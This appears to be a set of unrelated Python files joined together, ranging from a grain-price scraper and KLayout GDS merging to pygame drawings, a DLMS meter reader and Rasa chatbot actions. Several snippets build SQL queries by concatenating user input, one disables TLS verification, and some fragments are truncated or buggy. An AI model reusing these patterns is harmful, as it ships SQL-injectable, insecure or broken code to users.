if postPrMap[postDataSet[maxIndex]] < postPrMap[personName]:
maxIndex = j
strName = postDataSet[maxIndex]
postDataSet[maxIndex] = postDataSet[i]
postDataSet[i] = strName
count = 0
testLen = 100
for i in range(testLen):
count += 1
for bias in range(-2, 3):
j = i + bias
if j >= 0 and j < len and prevSortArray[i] == postDataSet[j]:
count -= 1
break
print(str(fileIndex)+": ", count/float(testLen))
accurate.append(1.0-count/float(testLen))
prevSortArray = copy.deepcopy(postDataSet)
print(accurate)
|
import csv
import re
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import pymysql
headers = {'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application'
'/signed-exchange;v=b3;q=0.9',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.'
'3945.130 Safari/537.36'}
def get_html(url, headers):
r = requests.get(url, headers=headers, verify=False)
return r.text
# def write_csv(data):
# name_file = 'rif.csv'
# with open(name_file, 'a', errors='ignore', newline='') as file:
# writer = csv.writer(file, delimiter=';')
# writer.writerow((data['product'], data['price'], data['city'], data['date']))
def write_in_sql(data):
connect = pymysql.connect(host='localhost', user='', password='', db='', charset='utf8')
cursor = connect.cursor()
write_sql = '''INSERT INTO Pshenitsa (Ad, Price, Region, Date) VALUES ('%s', '%s', '%s', '%s')''' % \
(data['product'], data['price'], data['city'], data['date'])
cursor.execute(write_sql)
connect.commit()
connect.close()
def parser_html(html):
soup = BeautifulSoup(html, 'lxml')
ads = soup.find_all('div', class_='main-price-elevator-item')
for ad in ads:
find_all_price = ad.find('table', class_='price').find_all('tr', class_='line-second price-data')
# print(find_all_price)
for find_price in find_all_price:
get_price = find_price.find('td').text.rstrip().lstrip().replace(',', '.').replace('ั.', 'ััะฑ/ะบะณ')
search_digits = re.search('(\d+.\d+)', get_price)
if search_digits is not None:
price = get_price
# print(price)
get_product = ad.find('div', class_='name').text.lower().rstrip().lstrip()
search_product = re.search('(ะฟัะตะฝะธัะฐ)', get_product)
if search_product is not None:
product = get_product.replace('-ะณะพ', '')
# print(product)
find_region = ad.find('p').text
search_city = re.search('(ะณ.\s\w+)', find_region)
if search_city is not None:
city = search_city.group().split()[1]
# print(city)
find_date = ad.find('h3').find('span').text.split()[0]
date = datetime.strptime(find_date, '%d.%m.%Y').strftime('%d.%m.%y')
# print(date)
info = {'product': product, 'price': price, 'city': city, 'date': date}
write_in_sql(info)
# print(info)
def main():
url = 'https://rif-rostov.ru/price/?arElevators%5B%5D=231&arElevators%5B%5D=99754&arElevators%5B%5D=42711' \
'&arElevators%5B%5D=42639&arElevators%5B%5D=42643&arElevators%5B%5D=99417&arElevators%5B%5D=99738' \
'&arElevators%5B%5D=42647&arElevators%5B%5D=99418&arElevators%5B%5D=96279&arElevators%5B%5D=97237' \
'&arElevators%5B%5D=96465&arElevators%5B%5D=226&arElevators%5B%5D=227&arElevators%5B%5D=98900&arElevators' \
'%5B%5D=576&arElevators%5B%5D=96517&arElevators%5B%5D=233&arElevators%5B%5D=97268&arCrops%5B%5D=127' \
'&arClasses%5B%5D=3&arClasses%5B%5D=%D0%B1%D0%B5%D0%BB%D0%BE%D0%B7%D0%B5%D1%80%D0%BD%D0%B0%D1%8F&arClasses' \
'%5B%5D=4&arClasses%5B%5D=5 '
parser_html(get_html(url, headers))
if __name__ == '__main__':
main()
|
import pya
# Load technology file
tech = pya.Technology()
tech.load(tech_file)
layoutOptions = tech.load_layout_options
# Load def file
main_layout = pya.Layout()
main_layout.read(in_def, layoutOptions)
# Clear cells
top_cell_index = main_layout.cell(design_name).cell_index()
print("INFO: Clearing cells...")
for i in range(main_layout.cells()):
if i != top_cell_index:
cname = main_layout.cell_name(i)
if not cname.startswith("VIA"):
print("\t" + cname)
main_layout.cell(i).clear()
# Load in the gds to merge
print("INFO: Merging gds files...")
for gds in in_gds.split():
print("\t" + gds)
main_layout.read(gds)
# Copy the top level only to a new layout
print("INFO: Copying toplevel cell '" + design_name + "'")
top_only_layout = pya.Layout()
top_only_layout.dbu = main_layout.dbu
top = top_only_layout.create_cell(design_name)
top.copy_tree(main_layout.cell(design_name))
# Write out the gds
print("INFO: Write out gds '" + out_gds + "'")
top_only_layout.write(out_gds)
|
class GameStats:
"""Track statistics for rocket_game"""
def __init__(self, r_game):
self.settings = r_game.settings
self.reset_stats()
# Start Rocket Game in an inactive state.
self.game_active = False
# High score should not be reset
with open("highscore.txt") as file_object:
self.high_score = int(file_object.read())
def reset_stats(self):
"""Initialize statistics that can change during the game."""
self.rockets_left = self.settings.rocket_limit
self.score = 0
self.fuel_remaining = self.settings.fuel
|
import pygame
from pygame.draw import *
pygame.init()
FPS = 30
screen = pygame.display.set_mode((800, 625))
# golo i telo
circle(screen, (255, 213, 0), (400, 650), 160)
circle(screen, (218, 195, 195), (400, 400), 150)
# nos kista
polygon(screen, (67, 37, 37), [(385, 385), (415, 385), (400, 415)])
polygon(screen, (0, 0, 0), [(385, 385), (415, 385), (400, 415)], 1)
# rot
polygon(screen, (180, 50, 50), [(300, 425), (500, 425), (405, 481)])
polygon(screen, (0, 0, 0), [(300, 425), (500, 425), (405, 480)], 1)
# glaz
circle(screen, (39, 185, 255), (350, 350), 35)
circle(screen, (39, 185, 255), (450, 350), 35)
circle(screen, (0, 0, 0), (350, 351), 35, 1)
circle(screen, (0, 0, 0), (450, 351), 35, 1)
# glaznicha
circle(screen, (0, 0, 0), (340, 345), 15)
circle(screen, (0, 0, 0), (460, 345), 15)
# ruka 1 i 2
polygon(screen, (218, 195, 195), [(170, 175), (185, 165), (260, 515), (245, 520)])
polygon(screen, (218, 195, 195), [(630, 175), (615, 165), (540, 515), (555, 520)])
# plecho
polygon(screen, (255, 213, 0), [(270, 490), (300, 525), (285, 575), (230, 565), (225, 515)])
polygon(screen, (0, 0, 0), [(270, 490), (300, 525), (285, 575), (229, 565), (225, 515)], 1)
polygon(screen, (245, 213, 0), [(530, 490), (500, 525), (515, 575), (570, 565), (575, 515)])
polygon(screen, (0, 0, 0), [(530, 490), (500, 525), (520, 575), (571, 565), (575, 515)], 1)
# kista
ellipse(screen, (218, 195, 195), (160, 135, 55, 92))
ellipse(screen, (218, 195, 195), (585, 135, 55, 92))
# baner
rect(screen, (136, 170, 55), (150, 100, 500, 100))
rect(screen, (0, 0, 0), (150, 100, 500, 100), 2)
# bykavi
font_obj = pygame.font.Font('freesansbold.ttf', 45)
text_surface_obj = font_obj.render('PYTHON is AMAZING', True, (0, 0, 0), (136, 170, 55))
text_rect_obj = text_surface_obj.get_rect()
text_rect_obj.center = (400, 150)
screen.blit(text_surface_obj, text_rect_obj)
# volosi
polygon(screen, (91, 30, 235), [(300, 284), (325, 271), (305, 255)])
polygon(screen, (0, 0, 0), [(300, 284), (325, 271), (305, 255)], 1)
polygon(screen, (91, 30, 235), [(500, 284), (475, 271), (495, 255)])
polygon(screen, (0, 0, 0), [(500, 284), (475, 271), (495, 255)], 1)
polygon(screen, (91, 30, 235), [(329, 269), (346, 260), (324, 247)])
polygon(screen, (0, 0, 0), [(329, 269), (346, 260), (324, 247)], 1)
polygon(screen, (91, 30, 235), [(471, 269), (456, 260), (476, 247)])
polygon(screen, (0, 0, 0), [(471, 269), (456, 260), (476, 247)], 1)
polygon(screen, (91, 30, 235), [(350, 259), (374, 254), (358, 235)])
polygon(screen, (0, 0, 0), [(350, 259), (374, 254), (358, 235)], 1)
polygon(screen, (91, 30, 235), [(450, 259), (426, 254), (442, 235)])
polygon(screen, (0, 0, 0), [(450, 259), (426, 254), (442, 235)], 1)
polygon(screen, (91, 30, 235), [(376, 253), (400, 251), (389, 232)])
polygon(screen, (0, 0, 0), [(376, 253), (400, 251), (389, 232)], 1)
polygon(screen, (91, 30, 235), [(424, 253), (400, 251), (411, 232)])
polygon(screen, (0, 0, 0), [(424, 253), (400, 251), (411, 232)], 1)
pygame.display.update()
clock = pygame.time.Clock()
finished = False
while not finished:
clock.tick(FPS)
for event in pygame.event.get():
if event.type == pygame.QUIT:
finished = True
pygame.quit() |
# coding=utf-8
"""
DATE: 2021/5/18
AUTHOR: Yanxi Li
"""
import time
import random
# ่ฟไธชไธ็จ
def random_time_v2():
a1 = (2021, 5, 16, 0, 0, 0, 0, 0, 0) # ่ฎพ็ฝฎๅผๅงๆฅๆๆถ้ดๅ
็ป๏ผ2020-04-12 00๏ผ00๏ผ00๏ผ
a2 = (2021, 5, 18, 0, 0, 0, 0, 0, 0) # ่ฎพ็ฝฎ็ปๆๆฅๆๆถ้ดๅ
็ป๏ผ2020-04-13 00๏ผ00๏ผ00๏ผ
start = time.mktime(a1) # ็ๆๅผๅงๆถ้ดๆณ
print("startๆถ้ดๆณ:", start)
end = time.mktime(a2) # ็ๆ็ปๆๆถ้ดๆณ
print("endๆถ้ดๆณ:", end)
# ้ๆบ็ๆ10ไธชๆฅๆๅญ็ฌฆไธฒ
for i in range(10):
t = random.randint(start, end) # ๅจๅผๅงๅ็ปๆๆถ้ดๆณไธญ้ๆบๅๅบไธไธช
date_touple = time.localtime(t) # ๅฐๆถ้ดๆณ็ๆๆถ้ดๅ
็ป
date_str = time.strftime("%Y-%m-%d %H:%M:%S", date_touple) # ๅฐๆถ้ดๅ
็ป่ฝฌๆๆ ผๅผๅๅญ็ฌฆไธฒ๏ผ1976-05-21๏ผ
print(date_str)
import requests
from bs4 import BeautifulSoup
def get_website_title():
res = requests.get("http://www.sohu.com")
# res.encoding = 'utf-8' # ็พๅบฆ้่ฆ๏ผไธ็ถไนฑ็
soup = BeautifulSoup(res.text, 'lxml')
print(soup.title.text)
if __name__ == '__main__':
get_website_title()
|
#!/usr/bin/env python
#_*_ coding:utf-8 _*_
'''
Created on 2018ๅนด3ๆ24ๆฅ
@author: yangxu
'''
'''
DriverStatus : [
[u'Pool Name', u'docker-8:2-407767-pool'],
[u'Pool Blocksize', u'65.54kB'],
[u'Base Device Size', u'10.74GB'],
[u'Backing Filesystem', u'xfs'],
[u'Udev Sync Supported', u'true'],
[u'Data file', u'/dev/loop0'],
[u'Metadata file', u'/dev/loop1'],
[u'Data loop file', u'/data/docker/devicemapper/devicemapper/data'],
[u'Metadata loop file', u'/data/docker/devicemapper/devicemapper/metadata'],
[u'Data Space Used', u'11.8MB'],
[u'Data Space Total', u'107.4GB'],
[u'Data Space Available', u'11.41GB'],
[u'Metadata Space Used', u'581.6kB'],
[u'Metadata Space Total', u'2.147GB'],
[u'Metadata Space Available', u'2.147GB'],
[u'Thin Pool Minimum Free Space', u'10.74GB'],
[u'Deferred Removal Enabled', u'true'],
[u'Deferred Deletion Enabled', u'true'],
[u'Deferred Deleted Device Count', u'0'],
[u'Library Version', u'1.02.140-RHEL7 (2017-05-03)']]
'''
import json
class AssetForm(object):
def __init__(self,data,modelname,address):
self.data = json.loads(data)
self.modelname = modelname
self.data_key = ['Name','OperatingSystem','NCPU','MemTotal','DriverStatus',
'ServerVersion','Driver','DockerRootDir']
self.hostname = self.data['Name']
self.address = address
self.sversion = self.data['OperatingSystem']
self.dversion = self.data['ServerVersion']
self.ddriver = self.data['Driver']
self.ddata = self.data['DockerRootDir']
self.cpu = str(self.data['NCPU'])
self.mem = str(self.data['MemTotal']/1000/1000/1000)+'GB'
self.disk = self.get_disk_value()
self.save()
def get_disk_value(self):
disk_value_list = self.data['DriverStatus']
for item in disk_value_list:
if 'Data Space Available' in item:
return item[1]
return None
def save(self):
self.modelname.objects.create(hostname=self.hostname,address=self.address,
sversion=self.sversion,cpu=self.cpu,
mem=self.mem,disk=self.disk,
dversion=self.dversion,ddriver=self.ddriver,
ddata=self.ddata,status='up') |
# utf-8
# Author: ilikewind
'''
extract patches from trainset to validateset.
'''
import os
import shutil
from tqdm import tqdm
from util_defined import config, hp
trainset_path = [config.NORMAL_PATCHES, config.TUMOR_PATCHES]
valset_path = [config.VAL_NORMAL_PATCHES, config.VAL_TUMOR_PATCHES]
val_wsi_name = ['normal5', 'normal7', 'normal18', 'normal19', 'normal22', 'normal31',
'tumor4', 'tumor8', 'tumor25', 'tumor31', 'tumor46', 'tumor58', 'tumor72']
for i, path in enumerate(trainset_path):
for file in tqdm(os.listdir(path)):
if file.split('_')[0] in (c for c in val_wsi_name):
print(file)
shutil.move(os.path.join(trainset_path[i], file), valset_path[i])
|
import subprocess
class Telegram:
def __init__(tg_loc):
self.tgcli_location = tg_loc
def start(self):
subprocess.Popen(self.tgcli_location
|
#!/usr/bin/env python
import csv
import pprint
import sys
import argparse
from collections import OrderedDict
import json
import copy
pp = pprint.PrettyPrinter(indent=0)
parser = argparse.ArgumentParser(description='Format input data into a gff file.')
parser.add_argument('csv_file_name', help="File for the original data (path + file).")
parser.add_argument('source', help="File label.")
parser.add_argument('case_list', help="List of strings to search for which indicate the cnv is clinically significiant.")
parser.add_argument('ctrl_list', help="List of strings to search for which indicate the cnv is a conrol cnv")
parser.add_argument('pheno_list', help="Phenotype list to filter on, '*' for all.")
args = parser.parse_args()
case_list = args.case_list.split('|')
ctrl_list = args.ctrl_list.split('|')
pheno_list = args.pheno_list.split('|')
# phenotypes to remove
OUT_LIST = ['IRRELEVANT', 'FAMILY_FOLLOW_UP', 'CHROMOSOME_ABNORMALIRY', 'CHROMOSOME_ABNORMALITY', \
'OTHER',
# added
'Multiple Congenital Anomalies',
'Congenital Anomaly',
'Dysmorphic Features',
'Parent of child with chromosome anomaly',
'Congenital Heart Defect',
'Family history of Autism',
'? Prader-Willi Syndrome',
'Epilepsy',
'Reason Not Provided',
'Family History',
'Genomic array imbalance in family',
# more
'CONGENITAL_MALFORMATION',
'MIM:176270',
'MIM:213300',
'MIM:608638',
]
RENAME_MAP = {
'Developmental Delay' : 'HP:0001263',
'Autism' : 'HP:0000717',
'Facial Dysmorphism' : 'HP:0001999',
'Cardiac Malformation' : 'HP:0002564',
'Seizures' : 'HP:0001250',
'Microcephaly' : 'HP:0000252',
'Behavioural/Psychiatric Abnormality' : 'HP:0000708',
'Cleft Palate' : 'HP:0000175',
'Failure to Thrive' : 'HP:0001508',
'Short Stature' : 'HP:0004322',
'Intellectual Disability' : 'HP:0001249',
'Learning Disability' : 'HP:0001328',
'Ambiguous Genitalia' : 'HP:0000062',
'Ventricular Septal Defect' : 'HP:0001629',
'Hypospadias' : 'HP:0000047',
'Stillbirth' : 'HP:0001624',
'Increased risk of malignancy' : 'HP:0006741',
'Amenorrhea' : 'HP:0000141',
'Intrauterine growth restriction' : 'HP:0001511',
'Speech delay' : 'HP:0002117',
}
TRANSFORM_VAL_MAP = {
'TYPE':{
'Gain':'DUP',
'Loss':'DEL'},
}
def make_gff(variant, i, counts):
'''Return a gff string.'''
# True if the CNV is fine to print
cnv_passes = True
# Label case and controls
if 'CLASSIFICATION' in variant:
if variant['CLASSIFICATION'] in ctrl_list:
cnvclass = 'CTL'
phenotype_prefix = 'CONTROL_'
elif variant['CLASSIFICATION'] in case_list:
cnvclass = 'CNV'
phenotype_prefix = ''
else:
# only print valid cases and controls
cnv_passes = False
cnvclass = 'ELSE'
phenotype_prefix = 'ELSE_'
# gff extra column
extra = []
for w in ['GENDER', 'SAMPLE_ID', 'TYPE', 'CYTOBAND', 'CLASSIFICATION']:
if w in TRANSFORM_VAL_MAP and variant[w] in TRANSFORM_VAL_MAP[w]:
to_append = TRANSFORM_VAL_MAP[w][variant[w]]
else:
to_append = variant[w]
extra.append('%s=%s' % (w, to_append))
# phenotypes extra column
current_phenotype_list = []
# only add 1 phenotype
does_not_have_a_phenotype = True
if type(variant['PHENOTYPE']) is list:
phenotype_list = variant['PHENOTYPE']
else:
phenotype_list = [variant['PHENOTYPE']]
for current_phenotype in phenotype_list:
# TODO: use multiple phenotypes?
if does_not_have_a_phenotype:
# filter phenotypes by args
if (pheno_list == ['*'] and (not current_phenotype in OUT_LIST)) or current_phenotype in pheno_list:
if current_phenotype in RENAME_MAP:
current_phenotype = RENAME_MAP[current_phenotype]
current_phenotype_list.append(phenotype_prefix + current_phenotype)
if not current_phenotype in counts:
counts[current_phenotype] = OrderedDict()
if not cnvclass in counts[current_phenotype]:
counts[current_phenotype][cnvclass] = 0
counts[current_phenotype][cnvclass] += 1
does_not_have_a_phenotype = False
phenotype_str = "[" + ",".join(current_phenotype_list) + "]"
extra.append("PHENOTYPE=%s" % phenotype_str)
# format main gff line
line = ['chr' + variant['CHR'], args.source, "%s.%s.%08d" % (cnvclass, args.source, i), variant['START'], variant['STOP'], '.', '.', '.']
# format last gff column
line.append(";".join(extra))
# only print the line if it includes the filtered phenotypes
if current_phenotype_list == []:
cnv_passes = False
if cnv_passes:
print "\t".join(line)
return counts
def change_header_120116(header):
replace_dict = {
'Date Scanned':'DATE_SCANNED',
'Lab no.':'SAMPLE_ID',
'Sex':'GENDER',
'Clinical Indication':'PHENOTYPE',
'Protocol':'PROTOCOL',
'Genome Build':'GENOME_BUILD',
'chromosome':'CHR',
'start':'START',
'stop':'STOP',
'band':'CYTOBAND',
'size':'SIZE',
'max start':'MAX_START',
'max stop':'MAX_STOP',
'Max size':'MAX_SIZE',
'No. probes':'NUM_PROBES',
'Gain/Loss':'TYPE',
'Classification':'CLASSIFICATION',
'Inheritance':'INHERITANCE',
'Log2 ratio':'LOG2_RATIO',
'ISCN':'ISCN',
}
new_header = []
for h in header:
new_header.append(replace_dict.get(h, h))
return new_header
firstline = file(args.csv_file_name).readline()
if len(firstline.split(",")) > len(firstline.split("\t")):
csv_reader = csv.reader(open(args.csv_file_name, 'rb'), delimiter=',')
else:
csv_reader = csv.reader(open(args.csv_file_name, 'rb'), delimiter='\t', quotechar='"')
i = -1
counts = OrderedDict()
for row in csv_reader:
if i == -1:
header = row
header = change_header_120116(header)
else:
variant = {}
# transform line of variant info into a dict based on the header
for j in range(len(row)):
# handle ALL_GENES column marta said don't use this column, intersect with genes myself
if header[j] == 'ALL_GENES':
variant[header[j]] = [word.strip().split('#') for word in row[j][1:-1].split(",")]
# handle list columns
if len(row[j]) > 0 and row[j][0] == "[":
variant[header[j]] = [word.strip() for word in row[j][1:-1].split(",")]
# handle single value columns
else:
variant[header[j]] = row[j]
# pp.pprint(variant)
if not '180' in variant['SAMPLE_ID']:
counts = make_gff(variant, i, counts)
i += 1
count_summary = OrderedDict()
count_summary['VALID'] = 0
for phenotype, type_dict in counts.iteritems():
for name, val in type_dict.iteritems():
if not name in count_summary:
count_summary[name] = 0
count_summary[name] += counts[phenotype][name]
if name in ['CNV', 'CTL']:
count_summary['VALID'] += counts[phenotype][name]
f = open("%s_cnv_stats.txt" % args.source.split(".")[0], 'w')
print >> f, json.dumps(counts, indent=4)
print >> f, json.dumps(count_summary, indent=4)
f.close()
actual_all = {}
|
class MonthTime:
def __init__(self,year=None,month=None,time_str=None):
self.year = year
self.month = month
if time_str is not None:
self.year,self.month,_ = time_str.split('/')
self.year, self.month = int(self.year),int(self.month)
def __lt__(self,other):
if self.year < other.year:
return True
elif self.year == other.year and self.month <other.month:
return True
else:
return False
def __eq__(self, other):
if self.year == other.year and self.month == other.month :
return True
else:
return False
def __gt__(self,other):
if self.year > other.year:
return True
elif self.year == other.year and self.month > other.month:
return True
else:
return False
def __ge__(self,other):
return self>other or self == other
def __le__(self, other):
return self<other or self == other
class DateTime:
def __init__(self,year=None,month=None,day=None,time_str=None):
self.year = year
self.month = month
self.day = day
if time_str is not None:
self.year,self.month,self.day = time_str.split('/')
self.year, self.month, self.day = int(self.year),int(self.month),int(self.day)
def __lt__(self,other):
if self.year < other.year:
return True
elif self.year == other.year and self.month <other.month:
return True
elif self.year == other.year and self.month == other.month and self.day<other.day:
return True
else:
return False
def __eq__(self, other):
if self.year == other.year and self.month == other.month and self.day == other.day:
return True
else:
return False
def __gt__(self,other):
if self.year > other.year:
return True
elif self.year == other.year and self.month > other.month:
return True
elif self.year == other.year and self.month == other.month and self.day > other.day:
return True
else:
return False
def __ge__(self,other):
return self>other or self == other
def __le__(self, other):
return self<other or self == other
def __set__(self, instance, value):
if isinstance(instance,TimeSect):
return TimeSect(value)
if isinstance(instance,str):
return TimeSect(value)
def __str__(self):
return "%d/%d/%d"%(self.year,self.month,self.day)
class TimeSect:
def __init__(self,time_str=None,time_sect = None):
if time_str:
outstr = time_str.split()
years = outstr[0]
times = outstr[1]
self.year,self.month,self.day = [int(k) for k in years.split("/")]
self.hour,self.minute,self.second = [int(k) for k in times.split(":")]
elif time_sect:
self.year = time_sect.year
self.month = time_sect.month
self.day = time_sect.day
self.year = time_sect.hour
self.minute = time_sect.mintue
self.second = time_sect.second
else:
self.year, self.month, self.day = None,None,None
self.hour, self.minute, self.second = None,None,None
def __lt__(self,other):
if self.year < other.year:
return True
elif self.year == other.year and self.month <other.month:
return True
elif self.year == other.year and self.month == other.month and self.day<other.day:
return True
elif self.year == other.year and self.month == other.month and self.day==other.day and\
self.hour < other.hour:
return True
elif self.year == other.year and self.month == other.month and self.day==other.day and\
self.hour == other.hour and self.minute < other.minute :
return True
elif self.year == other.year and self.month == other.month and self.day==other.day and\
self.hour == other.hour and self.minute == other.minute and self.second <other.second:
return True
else:
return False
def __eq__(self, other):
if self.year == other.year and self.month == other.month and self.day == other.day and \
self.hour == other.hour and self.minute == other.minute and self.second == other.second:
return True
else:
return False
def __gt__(self,other):
if self.year > other.year:
return True
elif self.year == other.year and self.month > other.month:
return True
elif self.year == other.year and self.month == other.month and self.day > other.day:
return True
elif self.year == other.year and self.month == other.month and self.day==other.day and\
self.hour > other.hour:
return True
elif self.year == other.year and self.month == other.month and self.day==other.day and\
self.hour == other.hour and self.minute > other.minute :
return True
elif self.year == other.year and self.month == other.month and self.day==other.day and\
self.hour == other.hour and self.minute == other.minute and self.second > other.second:
return True
else:
return False
def __ge__(self,other):
return self>other or self == other
def __le__(self, other):
return self<other or self == other
def __set__(self, instance, value):
if isinstance(instance,TimeSect):
return TimeSect(value)
if isinstance(instance,str):
return TimeSect(value)
def __str__(self):
return "%d-%d-%d\t%d:%d:%d"%(self.year,self.month,self.day,self.hour,self.minute,self.second)
|
#!/usr/local/bin/python
from __future__ import print_function
import serial
class dlmsError(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return repr(self.reason)
class dlms(object):
def __init__(self, serial_port = "/dev/cuaU3"):
self.ser = serial.Serial(
port = serial_port,
baudrate = 300,
bytesize = serial.SEVENBITS,
parity = serial.PARITY_EVEN,
timeout = 3.0)
def query(self):
self.ser.write("/?!\r\n")
state = 0
id = ""
cont = ""
sum = 0
while True:
a = self.ser.read(1)
if len(a) == 0:
raise dlmsError("Rx Timeout")
b = bytearray(a)[0] #Reads the ascii code of the first character
if state == 0:
# Read ID string
if b >= 32: #32 is a space
id += a
elif b == 13: #is carrige return
state = 1
else:
raise dlmsError(
"Illegal char in ident 0x%02x" % b)
state = 99
elif state == 1:
# NL ending ID string
if b != 10: #10 is new line
raise dlmsError(
"Ident has 0x%02x after CR" % b)
state = 99
else:
state = 2
elif state == 2:
# STX
if b != 2: #start of text
raise dlmsError(
"Expected STX not 0x%02x" % b)
state = 99
else:
state = 3
elif state == 3:
# message body
sum ^= b
if b != 3:
cont += a
else:
state = 4
elif state == 4:
# Checksum
if sum != b:
raise dlmsError(
"Checksum Mismatch")
state == 99
else:
return self.parse(id, cont)
elif state == 99:
# Error, flush
pass
assert False
def parse(self, id, cont):
l = list()
l.append(id)
l.append(dict())
cont = cont.split("\r\n")
if cont[-1] != "":
raise dlmsError(
"Last data item lacks CRNL")
if cont[-2] != "!":
raise dlmsError(
"Last data item not '!'")
for i in cont[:-2]:
if i[-1] != ")":
raise dlmsError(
"Last char of data item not ')'")
return None
i = i[:-1].split("(")
j = i[1].split("*")
l[1][i[0]] = j
return l
if __name__ == "__main__":
foo = dlms()
a = foo.query()
print("%16s: %s" % ("identifier", a[0]))
print("")
for i in a[1]:
j = a[1][i]
if len(j) == 2:
print("%16s: %s [%s]" % (i, j[0], j[1]))
else:
print("%16s: %s" % (i, j[0]))
|
# %% Some preparations
import shutil as sh
import os
from datetime import date
from pprint import pprint
import numpy as np
import plot_helper as ph
import mav_log_helper as mlh
Ts = 0.04 # Most probably
base_dir = "/home/slovak/fishbot/test/water_tank/"
test_day_dir = "fishbot/logs/" + date.today().strftime("%Y-%m-%d")
latest_flight = sorted(os.listdir(base_dir + test_day_dir))[-1]
log_dir = test_day_dir + "/" + latest_flight + "/"
# Or set explicitly
# log_dir = "fishbot/logs/2019-07-04/flight4/"
log_dir = base_dir + log_dir
print(log_dir)
data_json = mlh.dir_prepare(log_dir)
data_raw = mlh.dir_load(log_dir)
if not os.path.isfile(log_dir + "plotly-latest.min.js"):
sh.copy("plotly-latest.min.js", log_dir)
# %% ATTITUDE
plt = ph.WebPlot(log_dir + "attitude.html")
for k, v in data_raw.items():
if "ATT" not in v.keys():
continue
fig = ph.make_subplots(k, rows=1, cols=1)
print(k)
print(v.keys())
fig.append_trace(ph.get_ts_scatter(v, "ATT", "Roll", scaler=np.pi / 180), 1, 1)
fig.append_trace(ph.get_ts_scatter(v, "ATT", "Pitch", scaler=np.pi / 180), 1, 1)
fig.append_trace(ph.get_ts_scatter(v, "ATT", "Yaw", scaler=np.pi / 180), 1, 1)
#
# fig.append_trace(wp.get_ts_scatter(v, "IMU", "AccX"), 2, 1)
# fig.append_trace(wp.get_ts_scatter(v, "IMU", "AccY"), 2, 1)
# fig.append_trace(wp.get_ts_scatter(v, "IMU", "AccZ"), 2, 1)
#
# fig.append_trace(wp.get_ts_scatter(v, "IMU", "GyrX"), 3, 1)
# fig.append_trace(wp.get_ts_scatter(v, "IMU", "GyrY"), 3, 1)
# fig.append_trace(wp.get_ts_scatter(v, "IMU", "GyrZ"), 3, 1)
plt.plot(fig)
for k, v in data_raw.items():
if 'ATTITUDE' not in v.keys():
continue
fig = ph.make_subplots(k, rows=1, cols=1)
fig.append_trace(ph.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.roll"), 1, 1)
fig.append_trace(ph.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.pitch"), 1, 1)
fig.append_trace(ph.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.yaw"), 1, 1)
#
# fig.append_trace(wp.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.rollspeed"), 2, 1)
# fig.append_trace(wp.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.pitchspeed"), 2, 1)
# fig.append_trace(wp.get_ts_scatter(v, "ATTITUDE", "ATTITUDE.yawspeed"), 2, 1)
plt.plot(fig)
plt.show()
exit(0)
# %% RC ins and outs
plt = ph.WebPlot(log_dir + "rc_in_out.html")
for k, v in data_raw.items():
if "RCIN" not in v.keys():
continue
fig = ph.make_subplots(k, rows=6, cols=1)
for idx in range(1, 7):
fig.append_trace(ph.get_ts_scatter(v, "RCIN", "C" + str(idx)), idx, 1)
fig.append_trace(ph.get_ts_scatter(v, "RCOU", "C" + str(idx)), idx, 1)
plt.plot(fig)
plt.show()
# %% Stats for messages
def get_stats(msg_value):
if "timestamp" in msg_value.keys() and len(msg_value["timestamp"]) > 2:
return [
round(1/np.median(np.diff(msg_value["timestamp"]))),
# round(1/np.min(np.diff(msg_value["timestamp"]))),
# round(1/np.max(np.diff(msg_value["timestamp"]))),
]
else:
return ''
# %% All
msg_struct = [{msg_name: {trace_name: get_stats(msg_value) for trace_name, trace_value in msg_value.items()} for msg_name, msg_value in
data_raw[key].items()} for key in data_raw.keys()]
pprint(msg_struct)
# %% Dataflash
msg_struct = [{msg_name: {trace_name: get_stats(msg_value) for trace_name, trace_value in msg_value.items()} for msg_name, msg_value in
data_raw[key].items()} for key in ["1"]]
pprint(msg_struct)
# %% Mavlink
msg_struct = [{msg_name: {trace_name: get_stats(msg_value) for trace_name, trace_value in msg_value.items()} for msg_name, msg_value in
data_raw[key].items()} for key in ["flight"]]
pprint(msg_struct)
# %% Something more
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from rasa_core.actions.action import Action
from rasa_core.events import SlotSet
import sqlite3
class ActionSearchFaculty(Action):
def name(self):
return 'action_search_faculty'
def run(self, dispatcher, tracker, domain):
db = sqlite3.connect("sqlite.db")
cursor = db.cursor()
name = tracker.get_slot('faculty_name')
query = "SELECT about FROM faculty WHERE name LIKE '%"+name+"%';"
cursor.execute(query)
f=0
l=[]
for row in cursor:
f=1
c=list(row)
if c is not None:
l.append(c)
if f==0:
#description=glasearch(name)
#we are not calling glasearch() function because we cannot make our key public
dispatcher.utter_message("sorry no data found")
return[SlotSet("faculty_name",None)]
db.close()
dispatcher.utter_message("here are the details of faculty you asked for")
description = name
dispatcher.utter_message("{}".format(l))
return [SlotSet("faculty_name", description)]
class ActionSearchState(Action):
def name(self):
return 'action_search_state'
def run(self, dispatcher, tracker, domain):
db = sqlite3.connect("sqlite.db")
cursor = db.cursor()
name = tracker.get_slot("States")
try:
query = "SELECT city,address FROM officedata WHERE state LIKE '%"+ name +"%';"
cursor.execute(query)
except:
dispatcher.utter_message("An error occurred.")
f=0
l=[]
for row in cursor:
f=1
c=list(row)
if c is not None:
l.append(c)
if f==0:
description="sorry no office in that state found"
dispatcher.utter_message("{}".format(description))
return [SlotSet("States", None)]
db.close()
dispatcher.utter_message("here are the centres present in this state")
description = l
dispatcher.utter_message("{}".format(description))
return [SlotSet("States", name)]
class ActionAddName(Action):
def name(self):
return'action_add_name'
def run(self,dispatcher,tracker,domain):
name=tracker.get_slot('student_name')
return [SlotSet("student_name",name)]
class ActionAddDegree(Action):
def name(self):
return'action_add_degree'
def run(self,dispatcher,tracker,domain):
degree=tracker.get_slot('degree')
return [SlotSet("degree",degree)]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 14 09:18:05 2019
@author: jose
"""
